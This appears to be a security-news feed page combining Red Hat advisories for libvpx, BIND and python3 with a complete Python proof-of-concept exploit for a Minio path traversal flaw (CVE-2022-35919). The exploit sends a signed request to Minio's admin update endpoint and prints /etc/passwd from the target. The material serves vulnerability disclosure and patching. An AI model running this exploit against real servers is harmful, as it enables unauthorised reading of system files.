Red Hat Security Advisory 2023-5540-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5540-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5540  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
libvpx-1.9.0-7.el9_0.src.rpm

aarch64:  
libvpx-1.9.0-7.el9_0.aarch64.rpm  
libvpx-debuginfo-1.9.0-7.el9_0.aarch64.rpm  
libvpx-debugsource-1.9.0-7.el9_0.aarch64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_0.aarch64.rpm

ppc64le:  
libvpx-1.9.0-7.el9_0.ppc64le.rpm  
libvpx-debuginfo-1.9.0-7.el9_0.ppc64le.rpm  
libvpx-debugsource-1.9.0-7.el9_0.ppc64le.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_0.ppc64le.rpm

s390x:  
libvpx-1.9.0-7.el9_0.s390x.rpm  
libvpx-debuginfo-1.9.0-7.el9_0.s390x.rpm  
libvpx-debugsource-1.9.0-7.el9_0.s390x.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_0.s390x.rpm

x86_64:  
libvpx-1.9.0-7.el9_0.i686.rpm  
libvpx-1.9.0-7.el9_0.x86_64.rpm  
libvpx-debuginfo-1.9.0-7.el9_0.i686.rpm  
libvpx-debuginfo-1.9.0-7.el9_0.x86_64.rpm  
libvpx-debugsource-1.9.0-7.el9_0.i686.rpm  
libvpx-debugsource-1.9.0-7.el9_0.x86_64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_0.i686.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
libvpx-debuginfo-1.9.0-7.el9_0.aarch64.rpm  
libvpx-debugsource-1.9.0-7.el9_0.aarch64.rpm  
libvpx-devel-1.9.0-7.el9_0.aarch64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_0.aarch64.rpm

ppc64le:  
libvpx-debuginfo-1.9.0-7.el9_0.ppc64le.rpm  
libvpx-debugsource-1.9.0-7.el9_0.ppc64le.rpm  
libvpx-devel-1.9.0-7.el9_0.ppc64le.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_0.ppc64le.rpm

s390x:  
libvpx-debuginfo-1.9.0-7.el9_0.s390x.rpm  
libvpx-debugsource-1.9.0-7.el9_0.s390x.rpm  
libvpx-devel-1.9.0-7.el9_0.s390x.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_0.s390x.rpm

x86_64:  
libvpx-debuginfo-1.9.0-7.el9_0.i686.rpm  
libvpx-debuginfo-1.9.0-7.el9_0.x86_64.rpm  
libvpx-debugsource-1.9.0-7.el9_0.i686.rpm  
libvpx-debugsource-1.9.0-7.el9_0.x86_64.rpm  
libvpx-devel-1.9.0-7.el9_0.i686.rpm  
libvpx-devel-1.9.0-7.el9_0.x86_64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_0.i686.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvHAAoJENzjgjWX9erEt90P/inRqz/DbnoWVjSgNcsuvarw  
GqTJtKEmHTNmn0Nqk3oAXDg1d8EMr+H8Iql6KHrmBUV2DwbrTniaaARn0/ZNes70  
DSc65/kfbUbYxdvdHRp1lVqZSrTVA7FDr098h30pUF3TPOZfQP/ePYg2DjUn+jI4  
s/x7DsJL7SnlI3xsZo3OKxoEIrp9M9l+U3LQJ3A4kN67bDnNOXFcA/uYQt58bSfE  
kX5CK2P8mSalbVC96w6y8sDsUr9ZcZGgtF8bzh6dh5vmAPP/e+v6lOECSTYmCCYb  
126xDFEzJLZNMTkUvBaLkcE+M3isBwuNtJTumkDXMpH9CDkQ6QvoQH+JqHLkROOu  
gDX/55mR3i9UiSpK0OS22HuVU5I4PRAmlAdC2wm1kU3gm2qRBASz9d0fTUDXhVsg  
nJ5IgLfUAPOjY1N/IAantmWvmmSt191b3kHG+0+AEYMkwGWCIhXGbTg7PIuTvK9n  
Skxo2WwJ3B5+LiBayAaZ6z3dhdrxiPO+6jVez62Ujqse3BfwFjDrA0WNC3Hge3/H  
uGAJxdrDYR8Y4N3IL2qm+4pT1o+uGs03HueJdnFQBw4r/5asrCCx06qc70AlKO9d  
kD4Kwurr2BbAa4HzaKOijILfpLH+p2VXg2li8OT7yYsGc0Ienux5n7W0wHmRiqK/  
10Rfd+SBXPrj6eKf9sDx  
=fZBW  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5540-01

Minio version 2022-07-29T19-40-48Z suffers from a path traversal vulnerability.

    # Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal# Date: 2023-09-02# Exploit Author: Jenson Zhao# Vendor Homepage: https://min.io/# Software Link: https://github.com/minio/minio/# Version: Up to (excluding) 2022-07-29T19-40-48Z# Tested on: Windows 10# CVE : CVE-2022-35919# Required before execution: pip install minio,requestsimport urllib.parseimport requests, json, re, datetime, argparsefrom minio.credentials import Credentialsfrom minio.signer import sign_v4_s3class MyMinio():    secure = False    def __init__(self, base_url, access_key, secret_key):        self.credits = Credentials(            access_key=access_key,            secret_key=secret_key        )        if base_url.startswith('http://') and base_url.endswith('/'):            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'        elif base_url.startswith('https://') and base_url.endswith('/'):            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'            self.secure = True        else:            print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')    def poc(self):        datetimes = datetime.datetime.utcnow()        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')        urls = urllib.parse.urlparse(self.url)        headers = {            'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',            'X-Amz-Date': datetime_str,            'Host': urls.netloc,        }        headers = sign_v4_s3(            method='POST',            url=urls,            region='',            headers=headers,            credentials=self.credits,            content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',            date=datetimes,        )        if self.secure:            response = requests.post(url=self.url, headers=headers, verify=False)        else:            response = requests.post(url=self.url, headers=headers)        try:            message = json.loads(response.text)['Message']            pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'            matches = re.findall(pattern, message)            if matches:                print('There is CVE-2022-35919 problem with the url!')                print('The contents of the /etc/passwd file are as follows:')                for match in matches:                    print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],                                                        match[6]))            else:                print('There is no CVE-2022-35919 problem with the url!')                print('Here is the response message content:')                print(message)        except Exception as e:            print(                'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')            print(response.text)if __name__ == '__main__':    parser = argparse.ArgumentParser()    parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")    args = parser.parse_args()    minio = MyMinio(args.url, args.accesskey, args.secretkey)    minio.poc()

Minio 2022-07-29T19-40-48Z Path Traversal

Red Hat Security Advisory 2023-5526-01 - The Berkeley Internet Name Domain is an implementation of the Domain Name System protocols. BIND includes a DNS server ; a resolver library ; and tools for verifying that the DNS server is operating correctly. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: bind security update  
Advisory ID:       RHSA-2023:5526-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5526  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-3341   
=====================================================================

1. Summary:

An update for bind is now available for Red Hat Enterprise Linux 8.1 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain  
Name System (DNS) protocols. BIND includes a DNS server (named); a resolver  
library (routines for applications to use when interfacing with DNS); and  
tools for verifying that the DNS server is operating correctly.

Security Fix(es):

* bind: stack exhaustion in control channel code may lead to DoS  
(CVE-2023-3341)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, the BIND daemon (named) will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2239621 - CVE-2023-3341 bind: stack exhaustion in control channel code may lead to DoS

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

aarch64:  
bind-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-chroot-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-debugsource-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-devel-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-export-libs-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-libs-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-libs-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-libs-lite-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-libs-lite-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-lite-devel-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-pkcs11-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-pkcs11-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-pkcs11-devel-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-pkcs11-libs-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-pkcs11-libs-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-pkcs11-utils-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-pkcs11-utils-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-sdb-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-sdb-chroot-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-sdb-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-utils-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-utils-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm

noarch:  
bind-license-9.11.4-26.P2.el8_1.8.noarch.rpm  
python3-bind-9.11.4-26.P2.el8_1.8.noarch.rpm

ppc64le:  
bind-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-chroot-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-debugsource-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-devel-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-export-libs-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-libs-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-libs-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-libs-lite-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-libs-lite-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-lite-devel-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-pkcs11-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-pkcs11-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-pkcs11-devel-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-pkcs11-libs-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-pkcs11-libs-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-pkcs11-utils-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-pkcs11-utils-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-sdb-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-sdb-chroot-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-sdb-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-utils-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-utils-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm

s390x:  
bind-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-chroot-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-debugsource-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-devel-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-export-libs-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-libs-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-libs-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-libs-lite-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-libs-lite-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-lite-devel-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-pkcs11-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-pkcs11-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-pkcs11-devel-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-pkcs11-libs-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-pkcs11-libs-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-pkcs11-utils-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-pkcs11-utils-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-sdb-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-sdb-chroot-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-sdb-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-utils-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-utils-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm

x86_64:  
bind-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-chroot-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-debugsource-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-debugsource-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-devel-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-devel-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-export-libs-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-export-libs-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-libs-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-libs-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-libs-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-libs-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-libs-lite-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-libs-lite-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-libs-lite-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-libs-lite-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-lite-devel-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-lite-devel-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-pkcs11-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-pkcs11-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-pkcs11-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-pkcs11-devel-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-pkcs11-devel-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-pkcs11-libs-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-pkcs11-libs-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-pkcs11-libs-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-pkcs11-libs-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-pkcs11-utils-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-pkcs11-utils-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-pkcs11-utils-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-sdb-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-sdb-chroot-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-sdb-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-sdb-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-utils-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-utils-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-utils-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
bind-9.11.4-26.P2.el8_1.8.src.rpm

aarch64:  
bind-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-debugsource-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-export-devel-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-export-libs-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-export-libs-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-libs-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-libs-lite-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-pkcs11-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-pkcs11-libs-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-pkcs11-utils-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-sdb-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm  
bind-utils-debuginfo-9.11.4-26.P2.el8_1.8.aarch64.rpm

ppc64le:  
bind-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-debugsource-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-export-devel-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-export-libs-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-export-libs-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-libs-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-libs-lite-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-pkcs11-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-pkcs11-libs-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-pkcs11-utils-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-sdb-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm  
bind-utils-debuginfo-9.11.4-26.P2.el8_1.8.ppc64le.rpm

s390x:  
bind-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-debugsource-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-export-devel-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-export-libs-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-export-libs-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-libs-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-libs-lite-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-pkcs11-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-pkcs11-libs-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-pkcs11-utils-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-sdb-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm  
bind-utils-debuginfo-9.11.4-26.P2.el8_1.8.s390x.rpm

x86_64:  
bind-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-debugsource-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-debugsource-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-export-devel-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-export-devel-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-export-libs-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-export-libs-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-export-libs-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-export-libs-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-libs-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-libs-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-libs-lite-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-libs-lite-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-pkcs11-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-pkcs11-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-pkcs11-libs-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-pkcs11-libs-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-pkcs11-utils-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-pkcs11-utils-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-sdb-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-sdb-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm  
bind-utils-debuginfo-9.11.4-26.P2.el8_1.8.i686.rpm  
bind-utils-debuginfo-9.11.4-26.P2.el8_1.8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3341  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvGAAoJENzjgjWX9erETy4P+wTqf6hhSXqBso+87ES8muOP  
a9A9TTQ3dFtWv15vsbBV97b7ZLnGcJ4EahIAzyvr/YA5Rw/jsUMJZh/J45MRd8Xq  
8c9S/8YaOU1kQkSzzthN6iWmwtDP5yuE6emidloCL8gr0ib4dKY29cym81Uat0vI  
G5bAvCktAoJ7+sASVWzwbo3+zVjF65v9NpOIO0Ot1w1v96V1gfIuhyqcxSc1sb5H  
dIMnyrIsUTT5DiEhy30qCWLCPrDIRWLrdTg0DUGWwl0Q8uoOlEEVr1UOEP9iBZMc  
N8ZJ14S4/k0Saqjru7AMeKiN4BAB3UofuPxmlHhH8qjcAgn72kuJOIe/W+xEmLGH  
wBo4B6MdyyhtxD9eqNmANFJiFIVSjzuxPkKA0UZHL6rbeNWGU2pqeEle4uMy3KsX  
bnQNX8tLJ+o0qpBB9IpjeAE+6X41qaaaT4JBERftLb2xqUBv2MEt+NyPwlbf7Vit  
rHkjBDVyYCtBm6EwaipUkEIXLr0/uHP6wnb610Vars6aP0e858EpzivSSv6mljLU  
Hm/DHSf1kAx0+qjYEOK5kpbt0T8PaAt8UiWyTTo1v3+/oOLezHuUD0GHG/NcBzQ3  
plSeTTDPTyaNhtqpHaWjQfeXeZT2nvFlAYWn+gPE0V+KSc9CCBCSPH+KYJO5Fsgj  
a+VDjWB0wU6RWPcuDgx/  
=u5EL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5526-01

Red Hat Security Advisory 2023-5528-01 - Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: python3 security update  
Advisory ID:       RHSA-2023:5528-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5528  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-40217   
=====================================================================

1. Summary:

An update for python3 is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux BaseOS AUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v. 8.2) - x86_64

3. Description:

Python is an interpreted, interactive, object-oriented programming  
language, which includes modules, classes, exceptions, very high level  
dynamic data types and dynamic typing. Python supports interfaces to many  
system calls and libraries, as well as to various windowing systems.

Security Fix(es):

* python: TLS handshake bypass (CVE-2023-40217)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2235789 - CVE-2023-40217 python: TLS handshake bypass

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

x86_64:  
platform-python-3.6.8-24.el8_2.2.i686.rpm  
platform-python-debug-3.6.8-24.el8_2.2.i686.rpm  
platform-python-debug-3.6.8-24.el8_2.2.x86_64.rpm  
platform-python-devel-3.6.8-24.el8_2.2.i686.rpm  
platform-python-devel-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.i686.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debugsource-3.6.8-24.el8_2.2.i686.rpm  
python3-debugsource-3.6.8-24.el8_2.2.x86_64.rpm  
python3-idle-3.6.8-24.el8_2.2.i686.rpm  
python3-idle-3.6.8-24.el8_2.2.x86_64.rpm  
